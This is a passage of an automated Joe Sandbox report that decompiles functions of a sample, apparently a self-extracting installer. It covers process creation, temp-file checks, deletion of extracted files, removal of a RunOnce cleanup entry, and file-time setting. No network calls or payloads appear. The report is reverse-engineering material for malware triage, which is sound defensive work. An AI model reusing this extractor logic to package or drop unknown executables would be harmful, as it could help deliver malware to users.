                                                                                                                                                                                                                                            				intOrPtr _t53;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t45 = __edx;
                                                                                                                                                                                                                                            				_t20 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                                                            				_t39 = __ecx;
                                                                                                                                                                                                                                            				_t49 = 1;
                                                                                                                                                                                                                                            				_t22 = 0;
                                                                                                                                                                                                                                            				if(__ecx == 0) {
                                                                                                                                                                                                                                            					L13:
                                                                                                                                                                                                                                            					return E010D6CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                                                            				if(_t25 == 0) {
                                                                                                                                                                                                                                            					 *0x10d9124 = E010D6285();
                                                                                                                                                                                                                                            					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
                                                                                                                                                                                                                                            					_t45 = 0x4c4;
                                                                                                                                                                                                                                            					E010D44B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					_t49 = 0;
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					_t22 = _t49;
                                                                                                                                                                                                                                            					goto L13;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                                                            				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                                                            				_t44 = _v528;
                                                                                                                                                                                                                                            				_t53 =  *0x10d8a28; // 0x0
                                                                                                                                                                                                                                            				if(_t53 == 0) {
                                                                                                                                                                                                                                            					_t34 =  *0x10d9a2c;
                                                                                                                                                                                                                                            					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                                                            						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                                                            						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                                                            							 *0x10d9a2c = _t44;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E010D411B(_t34, _t44);
                                                                                                                                                                                                                                            				CloseHandle(_v544.hThread);
                                                                                                                                                                                                                                            				CloseHandle(_v544);
                                                                                                                                                                                                                                            				if(( *0x10d9a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d4108
                                                                                                                                                                                                                                            0x010d4049
                                                                                                                                                                                                                                            0x010d405c
                                                                                                                                                                                                                                            0x010d4062
                                                                                                                                                                                                                                            0x010d4068
                                                                                                                                                                                                                                            0x010d406e
                                                                                                                                                                                                                                            0x010d4070
                                                                                                                                                                                                                                            0x010d4077
                                                                                                                                                                                                                                            0x010d407f
                                                                                                                                                                                                                                            0x010d4089
                                                                                                                                                                                                                                            0x010d408b
                                                                                                                                                                                                                                            0x010d408b
                                                                                                                                                                                                                                            0x010d4089
                                                                                                                                                                                                                                            0x010d4077
                                                                                                                                                                                                                                            0x010d4091
                                                                                                                                                                                                                                            0x010d409c
                                                                                                                                                                                                                                            0x010d40a8
                                                                                                                                                                                                                                            0x010d40b8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d40c2
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d40c2

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 010D4033
                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 010D4049
                                                                                                                                                                                                                                            • GetExitCodeProcess.KERNELBASE ref: 010D405C
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 010D409C
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 010D40A8
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 010D40DC
                                                                                                                                                                                                                                            • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 010D40E9
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3183975587-0
                                                                                                                                                                                                                                            • Opcode ID: 54f134a69a6fe14670978b3cf2ce4aec2f92b61e36ee048346cf19e0cee113e0
                                                                                                                                                                                                                                            • Instruction ID: 74f910aa1002154ade6312213230306f09f494e261e2144b5384ce0c4e1cb9e5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 54f134a69a6fe14670978b3cf2ce4aec2f92b61e36ee048346cf19e0cee113e0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1231B135742318ABEB709B79DC48FAB7BB8EB94700F1001A9F985D2551C6364881CF50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 659 10d58c8-10d58d5 660 10d58d8-10d58dd 659->660 660->660 661 10d58df-10d58f1 LocalAlloc 660->661 662 10d5919-10d5959 call 10d1680 call 10d658a CreateFileA LocalFree 661->662 663 10d58f3-10d5901 call 10d44b9 661->663 667 10d5906-10d5910 call 10d6285 662->667 672 10d595b-10d596c CloseHandle GetFileAttributesA 662->672 663->667 673 10d5912-10d5918 667->673 672->667 674 10d596e-10d5970 672->674 674->667 675 10d5972-10d597b 674->675 675->673
                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                            			E010D58C8(intOrPtr* __ecx) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				intOrPtr _t6;
                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                                            				signed char _t16;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				intOrPtr* _t27;
                                                                                                                                                                                                                                            				CHAR* _t33;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_t33 = __ecx;
                                                                                                                                                                                                                                            				_t27 = __ecx;
                                                                                                                                                                                                                                            				_t1 = _t27 + 1; // 0x10d91e5
                                                                                                                                                                                                                                            				_t23 = _t1;
                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                            					_t6 =  *_t27;
                                                                                                                                                                                                                                            					_t27 = _t27 + 1;
                                                                                                                                                                                                                                            				} while (_t6 != 0);
                                                                                                                                                                                                                                            				_t2 = _t27 - _t23 + 0x14; // 0x10d91f9
                                                                                                                                                                                                                                            				_t36 = _t2;
                                                                                                                                                                                                                                            				_t20 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                                                            				if(_t20 != 0) {
                                                                                                                                                                                                                                            					E010D1680(_t20, _t36, _t33);
                                                                                                                                                                                                                                            					E010D658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                                                            					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                                                            					_v8 = _t10;
                                                                                                                                                                                                                                            					LocalFree(_t20);
                                                                                                                                                                                                                                            					_t12 = _v8;
                                                                                                                                                                                                                                            					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                                                            						goto L4;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						CloseHandle(_t12);
                                                                                                                                                                                                                                            						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                                                            						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                                                            							goto L4;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							 *0x10d9124 = 0;
                                                                                                                                                                                                                                            							_t14 = 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E010D44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                                            					 *0x10d9124 = E010D6285();
                                                                                                                                                                                                                                            					_t14 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t14;
                                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,010D91F9,00000001,010D91E4,00000000,010D91E4,?,010D5534,010D91E4,00000001,010D91E4,00000000), ref: 010D58E7
                                                                                                                                                                                                                                            • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,010D91E4,?,010D5534,010D91E4,00000001,010D91E4,00000000), ref: 010D5943
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,010D5534,010D91E4,00000001,010D91E4,00000000), ref: 010D594D
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,010D5534,010D91E4,00000001,010D91E4,00000000), ref: 010D595C
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(010D91E4,?,010D5534,010D91E4,00000001,010D91E4,00000000), ref: 010D5963
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
• Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                                                            • String ID: TMP4351$.TMP
                                                                                                                                                                                                                                            • API String ID: 747627703-2619824408
                                                                                                                                                                                                                                            • Opcode ID: 0036fcb8c811dced1aa4640e3ac358996f8f8bbfa2e54a89d65aa8bc2f120182
                                                                                                                                                                                                                                            • Instruction ID: 2e8ec024b2f81bcc9e39ebafced0b9f4261f17996df3a835a5bbb4d3ec8278f2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0036fcb8c811dced1aa4640e3ac358996f8f8bbfa2e54a89d65aa8bc2f120182
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 561138317013216BD7301E7D9C0DA9BBFADDF46260B004659F9C5D31C4CE75980583A0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            control_flow_graph 635 10d51e5-10d520b call 10d468f LocalAlloc 638 10d522d-10d523c call 10d468f 635->638 639 10d520d-10d5228 call 10d44b9 call 10d6285 635->639 644 10d523e-10d5260 call 10d44b9 LocalFree 638->644 645 10d5262-10d5270 lstrcmpA 638->645 654 10d52b0 639->654 644->654 648 10d527e-10d529c call 10d44b9 LocalFree 645->648 649 10d5272-10d5273 LocalFree 645->649 657 10d529e-10d52a4 648->657 658 10d52a6 648->658 652 10d5279-10d527c 649->652 655 10d52b2-10d52b5 652->655 654->655 657->652 658->654
                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E010D51E5(void* __eflags) {
                                                                                                                                                                                                                                            				int _t5;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				void* _t28;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t1 = E010D468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                            				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                            				if(_t28 != 0) {
                                                                                                                                                                                                                                            					if(E010D468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                                                            						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                                                            						if(_t5 != 0) {
                                                                                                                                                                                                                                            							_t6 = E010D44B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                                                            							LocalFree(_t28);
                                                                                                                                                                                                                                            							if(_t6 != 6) {
                                                                                                                                                                                                                                            								 *0x10d9124 = 0x800704c7;
                                                                                                                                                                                                                                            								L10:
                                                                                                                                                                                                                                            								return 0;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							 *0x10d9124 = 0;
                                                                                                                                                                                                                                            							L6:
                                                                                                                                                                                                                                            							return 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						LocalFree(_t28);
                                                                                                                                                                                                                                            						goto L6;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					E010D44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					LocalFree(_t28);
                                                                                                                                                                                                                                            					 *0x10d9124 = 0x80070714;
                                                                                                                                                                                                                                            					goto L10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E010D44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            				 *0x10d9124 = E010D6285();
                                                                                                                                                                                                                                            				goto L10;
                                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46A0
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: SizeofResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46A9
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46C3
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: LoadResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46CC
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: LockResource.KERNEL32(00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46D3
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: memcpy_s.MSVCRT ref: 010D46E5
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,010D2F4D,?,00000002,00000000), ref: 010D5201
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 010D5250
                                                                                                                                                                                                                                              • Part of subcall function 010D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010D4518
                                                                                                                                                                                                                                              • Part of subcall function 010D44B9: MessageBoxA.USER32(?,?,010D9154,00010010), ref: 010D4554
                                                                                                                                                                                                                                              • Part of subcall function 010D6285: GetLastError.KERNEL32(010D5BBC), ref: 010D6285
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$UPROMPT
                                                                                                                                                                                                                                            • API String ID: 957408736-2980973527
                                                                                                                                                                                                                                            • Opcode ID: cd17712228d3c7022e5bcd14cef9cedcbc5e5ff81984b1c2bbae8dd37e66f5c4
                                                                                                                                                                                                                                            • Instruction ID: 9dc075ffa85ff16943a10f021ac7e458c679cc46459b8cf2e1e6a8eca8bcb0d3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cd17712228d3c7022e5bcd14cef9cedcbc5e5ff81984b1c2bbae8dd37e66f5c4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1911C8B5702301ABD3656BB59C45F7B65EDEBCA394B00442DFEC2D6584DE7E8C014228
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E010D1FE1(void* __ecx) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				long _t4;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				if( *0x10d8530 != 0) {
                                                                                                                                                                                                                                            					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                                                            					if(_t4 == 0) {
                                                                                                                                                                                                                                            						RegDeleteValueA(_v8, "wextract_cleanup2"); // executed
                                                                                                                                                                                                                                            						return RegCloseKey(_v8);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t4;
                                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,010D538C,?,?,010D538C), ref: 010D2005
                                                                                                                                                                                                                                            • RegDeleteValueA.KERNELBASE(010D538C,wextract_cleanup2,?,?,010D538C), ref: 010D2017
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(010D538C,?,?,010D538C), ref: 010D2020
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup2
                                                                                                                                                                                                                                            • API String ID: 849931509-3354236729
                                                                                                                                                                                                                                            • Opcode ID: 1d631d110ecd28433f40a3823eba7786a527194f12accbed3bcbe1f9f0e302cc
                                                                                                                                                                                                                                            • Instruction ID: b383128f3b5df4afc10fcca19cf3e39e25707b06240a20ecd6d6cf88b70c1869
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1d631d110ecd28433f40a3823eba7786a527194f12accbed3bcbe1f9f0e302cc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 18E04F30651318FBEB318A91EC0EF597F6AEB00780F104299FE84A1059E7665A10D708
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 74%
                                                                                                                                                                                                                                            			E010D52B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				signed int _t11;
                                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                                            				void* _t29;
                                                                                                                                                                                                                                            				CHAR** _t31;
                                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                                            				signed int _t33;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t28 = __edi;
                                                                                                                                                                                                                                            				_t22 = __ecx;
                                                                                                                                                                                                                                            				_t21 = __ebx;
                                                                                                                                                                                                                                            				_t9 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                                            				_t31 =  *0x10d91e0;
                                                                                                                                                                                                                                            				if(_t31 != 0) {
                                                                                                                                                                                                                                            					_push(__edi);
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						_t29 = _t31;
                                                                                                                                                                                                                                            						if( *0x10d8a24 == 0 &&  *0x10d9a30 == 0) {
                                                                                                                                                                                                                                            							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                                                            							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t31 = _t31[1];
                                                                                                                                                                                                                                            						LocalFree( *_t29);
                                                                                                                                                                                                                                            						LocalFree(_t29);
                                                                                                                                                                                                                                            					} while (_t31 != 0);
                                                                                                                                                                                                                                            					_pop(_t28);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t11 =  *0x10d8a20; // 0x0
                                                                                                                                                                                                                                            				_pop(_t32);
                                                                                                                                                                                                                                            				if(_t11 != 0 &&  *0x10d8a24 == 0 &&  *0x10d9a30 == 0) {
                                                                                                                                                                                                                                            					_push(_t22);
                                                                                                                                                                                                                                            					E010D1781( &_v268, 0x104, _t22, 0x10d91e4);
                                                                                                                                                                                                                                            					if(( *0x10d9a34 & 0x00000020) != 0) {
                                                                                                                                                                                                                                            						E010D65E8( &_v268);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                                                            					_t22 =  &_v268;
                                                                                                                                                                                                                                            					E010D2390( &_v268);
                                                                                                                                                                                                                                            					_t11 =  *0x10d8a20; // 0x0
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if( *0x10d9a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                                                            					_t11 = E010D1FE1(_t22); // executed
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				 *0x10d8a20 =  *0x10d8a20 & 0x00000000;
                                                                                                                                                                                                                                            				return E010D6CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(?,00000080,?,00000000), ref: 010D52F2
                                                                                                                                                                                                                                            • DeleteFileA.KERNELBASE(?), ref: 010D52FA
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,?,00000000), ref: 010D5305
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?), ref: 010D530C
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(010D11FC,?,010D91E4), ref: 010D5363
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2833751637-0
                                                                                                                                                                                                                                            • Opcode ID: e9649c367017c85b7069fb80507ba971a30f4d6f5b5b37aea655f8d6e36475be
                                                                                                                                                                                                                                            • Instruction ID: 3d297d03583c70ccbe2e03df99f2271f6fd25f6a6fb8ccb19ffd4b185023174f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e9649c367017c85b7069fb80507ba971a30f4d6f5b5b37aea655f8d6e36475be
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1621A131502315DBEB719B2CEC08BA97BF0BB14714F04819AFDC257198CFBA5984CB81
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E010D4C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                                                            				struct _FILETIME _v12;
                                                                                                                                                                                                                                            				struct _FILETIME _v20;
                                                                                                                                                                                                                                            				FILETIME* _t14;
                                                                                                                                                                                                                                            				int _t15;
                                                                                                                                                                                                                                            				signed int _t21;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t21 = __ecx * 0x18;
                                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t21 + 0x10d8d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t14 =  &_v12;
                                                                                                                                                                                                                                            					_t15 = SetFileTime( *(_t21 + 0x10d8d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                                                            					if(_t15 == 0) {
                                                                                                                                                                                                                                            						goto L5;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 010D4C54
                                                                                                                                                                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 010D4C66
                                                                                                                                                                                                                                            • SetFileTime.KERNELBASE(?,?,?,?), ref: 010D4C7E
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
